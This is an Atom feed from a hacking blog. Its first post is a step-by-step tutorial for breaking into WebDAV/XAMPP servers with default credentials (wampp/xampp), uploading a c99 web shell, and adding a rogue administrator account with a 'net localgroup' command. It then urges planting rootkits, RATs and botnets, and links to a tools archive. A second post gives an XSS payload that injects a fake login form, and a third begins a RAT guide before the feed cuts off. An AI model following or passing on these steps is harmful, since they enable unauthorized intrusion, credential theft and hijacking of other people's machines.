<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-4138059781742552827</id><updated>2011-12-15T03:31:05.432-08:00</updated><category term='Visual Basic'/><category term='Fake Site'/><category term='Protection'/><category term='Tools'/><category term='Hacking'/><category term='Hacked'/><category term='Deface'/><title type='text'>D3xt0p Cr3w</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>15</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-8974536501352599160</id><published>2011-12-14T02:43:00.000-08:00</published><updated>2011-12-14T20:40:26.485-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Deface'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Hack WebDAV &amp; Deface</title><content type='html'>Alright guy's today in this tutorial I'll be explaining how to use the webdav exploit. The link for the tools used for this tutorial can be found in the bottom of this tutorial. For those of you who do not know what a Webdav is here is the definition.&lt;br /&gt;&lt;blockquote&gt;&lt;span style="color: cyan;"&gt;Web-based Distributed Authoring and Versioning, or WebDAV, is a set of extensions to the Hypertext Transfer Protocol (HTTP) that allows computer-users to edit and manage files collaboratively on remote World Wide Web servers.&lt;/span&gt;&lt;/blockquote&gt;But fo our purpose we will be using it to exploit RDP's or the Remote Desktop Protocal. For a better understanding of these with RDP's they could range from Vp's to Dedi's to just plain old home Pc's, but no matter what it is you will gain full access to the machine and can basically do whatever you want using a shell. For those of you who are new to the hacking scene a shell is a php script that allows you to view all of the files on the server you decide to host the shell on. The most common shells are the c99 or the r57, but in this case we will be using the c99. Now please be aware these are not the only shells available there are several posted throughout the forum and you can find them by simply using the search button located on the navbar. Now before being able to use the shell we have to find some vulnerable Ip's to gain access to for this we will be using the WebdavlinkCrawler which can be found in the webdav tools kit I have provided below here if you don't trust my download links simply don't download them it's that simple. Once you have managed to open the program you will be presented with this interface. &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/3j289.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="262" src="http://i.imgur.com/3j289.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;as you can see there is a Start, Stop, and Remove double. All of these terms will be explained later on, but what you are going to want to do is click the start button and it will being to search for the Ip's with webdav in them. Once you have managed to gather some ip's like you see in the picture here&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/Fq3EK.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="http://i.imgur.com/Fq3EK.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;Now please be aware this was only with about 15 seconds of searching and your results may differ depending on your connection speed as well as the amount of time you run the application. After you have all of your Ip's your going to want to click one so it's highlighted and the right click it you will be presented with a popup that looks like this&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/28gRs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="265" src="http://i.imgur.com/28gRs.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;I have no idea what that actually means,(if someone would like to translate and tell me please feel free.) but what it is doing is copying all of the Ip's you have scanned. After you have scanned all of the Ip's your going to want to paste them in a new word document&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/3CofW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="270" src="http://i.imgur.com/3CofW.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;once you have done so save it as something you can remember and put it in a convenient location. After you have saved your collected webdav Ip's in a word document your going to want to open the Ip Scanner in the folder. It will look like this&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/sYB8n.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="227" src="http://i.imgur.com/sYB8n.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;what your going to want to do is click the "Get Ip's" button and browse to your recently saved text file. After you have your ip's in place&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/87VSw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="227" src="http://i.imgur.com/87VSw.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;your going to want to press the scan button what this is doing is now taking all of your Webdav Ip's and figuring out which one's are vulnerable to this particular exploit. The one's on the right are the ones it scanned and if you happen to get any in the middle those are the one's you can exploit. In my case this time I didn't happen to have any that were open to this exploit because I had a limited amount of Ip's. After you have managed to gather some ip's in the middle column and are ready to exploit the server you can just double check by going to the ip/webdav/ in your browser and Ip being one of the exploited ones you managed to get and your going to be looking for an index page that says Webdav Test page. After you have confirmed it is ready to go your going to want to open "map network drive" this can be found by either right clicking Network or my computer in the start menu.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/P1ICx.png%5B/img" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="302" src="http://i.imgur.com/P1ICx.png%5B/img" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;what your going to want to click on is the hyperlink that reads " Connect to a website that you can use to store your document's and pictures. You will be presented with a screen all you have to do is click next. And the your going to want to click Choose a custom network location.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/tvWW7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="338" src="http://i.imgur.com/tvWW7.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;Now this is the important screen it should look like this&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/gn07w.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="337" src="http://i.imgur.com/gn07w.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;What you have to do is put the Ip/webdav in the text box and click next&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/21CT2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="242" src="http://i.imgur.com/21CT2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;you should then be prompted with a login box the default username is wampp and the default password is xampp. Once you have successfully connected you can now browse it's folder's so what you have to do now is just drag and drop the shell.php in side the main directory&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/li8wP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://i.imgur.com/li8wP.png" width="314" /&gt;&lt;/a&gt;&lt;/div&gt;After doing so go to ip/webdav/shell.php it should look like the following&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i.imgur.com/aiLlM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="212" src="http://i.imgur.com/aiLlM.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;Feel free to use that Ip if you are that much of a noob and cannot do anything for yourself. Once you are viewing your shell inside the execute textbox your going to want to do the following commands&lt;br /&gt;&lt;blockquote&gt;&lt;span style="color: cyan;"&gt;net localgroup administrators SUPPORT /Add&lt;/span&gt;&lt;/blockquote&gt;What this is doing is making the remote desktop username SUPPORT and the password !password!. So now the last and final step is to open remote desktop and connect using the Ip and the login detail's we have just created. The shell is for you to explore and discover for yourself. Now you may be wondering What can you do once your in?&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;Answer : 1.You can do so much! Plant Rootkits/ Upload your RAT on the server:D&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;2. I upload my RAT’s incase they try to take back there dedi.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;3. Host a web IRC bot or Shell Booter&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;4. Store files or host websites or shells&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;5. Make a Botnet!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;TOOLS&lt;br /&gt;&lt;blockquote&gt;&lt;span style="color: cyan;"&gt;http://dl.dropbox.com/u/18083172/Webdav%20tools.rar&lt;/span&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-8974536501352599160?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/8974536501352599160/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/12/hack-webdav-deface.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/8974536501352599160'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/8974536501352599160'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/12/hack-webdav-deface.html' title='Hack WebDAV &amp;amp; Deface'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-3303691126983289271</id><published>2011-11-25T03:41:00.000-08:00</published><updated>2011-12-14T20:40:26.532-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>How to Cross Site Scripting (XSS)</title><content type='html'>&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;What is Cross Site Scripting?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. XSS in itself is a threat which is brought about by the internet security weaknesses of client-side scripting languages, with HTML and JavaScript (others being VBScript, ActiveX, HTML, or Flash) as the prime culprits for this exploit. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed. There are many slight variations to this theme, however all XSS attacks follow this pattern, which is depicted in the diagram below.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.acunetix.com/general/images/websitesecurity/xssattack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="http://www.acunetix.com/general/images/websitesecurity/xssattack.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;A basic example of XSS is when a malicious user injects a script in a legitimate shopping site URL which in turn redirects a user to a fake but identical page. The malicious page would run a script to capture the cookie of the user browsing the shopping site, and that cookie gets sent to the malicious user who can now hijack the legitimate user’s session. Although no real hack has been performed against the shopping site, XSS has still exploited a scripting weakness in the page to snare a user and take command of his session. A trick which often is used to make malicious URLs less obvious is to have the XSS part of the URL encoded in HEX (or other encoding methods). This will look harmless to the user who recognizes the URL he is familiar with, and simply disregards and following ‘tricked’ code which would be encoded and therefore inconspicuous.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Site owners are always confident, but so are hackers!&lt;/span&gt;&lt;/b&gt; &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Without going into complicated technical details, one must be aware of the various cases which have shown that XSS can have serious consequences when exploited on a vulnerable web application. Many site owners dismiss XSS on the grounds that it cannot be used to steal sensitive data from a back-end database. This is a common mistake because the consequences of XSS against a web application and its customers have been proven to be very serious, both in terms of application functionality and business operation. An online business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits. Ironically, there are stories of site owners who have boldly claimed that XSS is not really a high-risk exploit. This has often resulted in a public challenge which hackers are always itching to accept, with the site owner having to later deal with a defaced application and public embarrassment.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;The repercussions of XSS&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Analysis of different cases which detail XSS exploits teaches us how the constantly changing web technology is nowhere close to making applications more secure. A thorough web search will reveal many stories of large-scale corporation web sites being hacked through XSS exploits, and the reports of such cases always show the same recurring consequences as being of the severe kind.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Exploited XSS is commonly used to achieve the following malicious results:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Identity theft&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Accessing sensitive or restricted information&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Gaining free access to otherwise paid for content&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Spying on user’s web browsing habits&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Altering browser functionality&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Public defamation of an individual or corporation&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Web application defacement&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Denial of Service attacks&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Any site owner with a healthy level of integrity would agree that none of the above can really be considered us frivolous or unimportant impacts on a vulnerable site. Security flaws in high-profile web sites have allowed hackers to obtain credit card details and user information which allowed them to perform transactions in their name. Legitimate users have been frequently tricked into clicking a link which redirects them to a malicious but legitimate-looking page which in turn captures all their details and sends them straight to the hacker. This example might not sound as bad as hacking into a corporate database; however it takes no effort to cause site visitors or customers to lose their trust in the application’s security which in turn can result in liability and loss of business.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;XSS Attack Vectors&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as &amp;lt;p&amp;gt; for paragraph, &amp;lt;img&amp;gt; for image and &amp;lt;script&amp;gt; for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behaviour. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;A practical example of XSS on an Acunetix test site.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;The following example is not a hacking tutorial. It is just a basic way to demonstrate how XSS can be used to control and modify the functionality of a web page and to re-design the way the page processes its output. The practical use of the example may be freely debated; however anyone may see the regular reports which describe how advanced XSS is used to achieve very complex results, most commonly without being noticed by the user. I encourage also those individuals with no hacking knowledge to try the following example, I am sure you will find it interesting.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;1. Load the following link in your browser: &lt;b&gt;&lt;a href="http://testasp.vulnweb.com/search.asp"&gt;http://testasp.vulnweb.com/search.asp&lt;/a&gt;,&lt;/b&gt; you will notice that the page is a simple page with an input field for running a search&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.acunetix.com/general/images/websitesecurity/xss_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://www.acunetix.com/general/images/websitesecurity/xss_1.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;2. Try to insert the following code into the search field, and notice how a login form will be displayed on the page:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Please login with the form below before proceeding: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Please login with the form below before proceeding:&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;lt;form action="destination.asp"&amp;gt;&amp;lt;table&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Login:&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input type=text length=20 name=login&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Password:&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input type=text length=20 name=password&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;input type=submit value=LOGIN&amp;gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;then simply hit the search button after inserting the code.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="color: blue;"&gt;Through the XSS flaw on the page, it has been possible to create a FAKE login form which can convince gather a user’s credentials. As seen in step 2, the code contains a section which mentions “destination.asp”. That is where a hacker can decide where the FAKE login form will send the user’s log-in details for them to be retrieved and used maliciously.&lt;/div&gt;&lt;div style="color: blue;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="color: blue;"&gt;A hacker can also inject this code by passing it around via the browser’s address bar as follows:&lt;/div&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;a href="http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3C%20form+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+%20length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value%20%3DLOGIN%3E%3C%2Fform%3E"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3C form+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+ length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput +type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value %3DLOGIN%3E%3C%2Fform%3E&lt;/span&gt;&lt;/a&gt;&lt;/blockquote&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.acunetix.com/general/images/websitesecurity/xss_3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://www.acunetix.com/general/images/websitesecurity/xss_3.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;This will create the same result on the page, showing how XSS can be used in several different ways to achieve the same result. After the hacker retrieves the user’s log-in credentials, he can easily cause the browser to display the search page as it was originally and the user would not even realize that he has just been fooled. This example may also be seen in use in all those spam emails we all receive. It is very common to find an email in your inbox saying how a certain auctioning site suspects that another individual is using your account maliciously, and it then asks you to click a link to validate your identity. This is a similar method which directs the unsuspecting user to a FAKE version of the auctioning site, and captures the user’s log-in credentials to then send them to the hacker.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Why wait to be hacked?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;The observation which can be made when new stories of the latest hacks are published is that the sites which belong to the large brands and corporations are hacked in exactly the same way as those sites owned by businesses on a much smaller budget. This clearly shows how lack of security is not a matter of resources, but it is directly dependant on the lack of awareness among businesses of all size. Statistically, 42% of web applications which request security audits are vulnerable to XSS, which is clearly the most recurring high-risk exploit among all the applications tested. The effort to raise awareness about how easy it is for an expert hacker to exploit a vulnerable application does not seem to be going too far. It is still very common to see the “We’ll see when I get hacked” mentality still lingering among site owners who finally risk losing a lot of money and also the trust of their customers. Anybody with the interest to research this matter will see how even individuals claiming to be security experts feel comfortable to state that XSS is over-rated and cannot really be used to achieve serious results on a web application. However further research will also prove that statistical figures speak for themselves, and those same statistics keep growing at a rate which will eventually overcast the claims of those incredulous “experts”.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-3303691126983289271?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/3303691126983289271/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/how-to-cross-site-scripting-xss.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/3303691126983289271'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/3303691126983289271'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/how-to-cross-site-scripting-xss.html' title='How to Cross Site Scripting (XSS)'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-5300589947414694832</id><published>2011-11-23T03:22:00.000-08:00</published><updated>2011-12-14T22:24:45.903-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Remote Administration Tool (RAT) Guide</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_qH05FKdqQD4/TM20ELVTcJI/AAAAAAAAAg4/vYkOKYFucxg/s1600/prorat+2.0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="242" src="http://3.bp.blogspot.com/_qH05FKdqQD4/TM20ELVTcJI/AAAAAAAAAg4/vYkOKYFucxg/s320/prorat+2.0.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_qH05FKdqQD4/TM20ELVTcJI/AAAAAAAAAg4/vYkOKYFucxg/s1600/prorat+2.0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="242" src="http://3.bp.blogspot.com/_qH05FKdqQD4/TM20ELVTcJI/AAAAAAAAAg4/vYkOKYFucxg/s320/prorat+2.0.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Whats RAT?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;How they work?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: 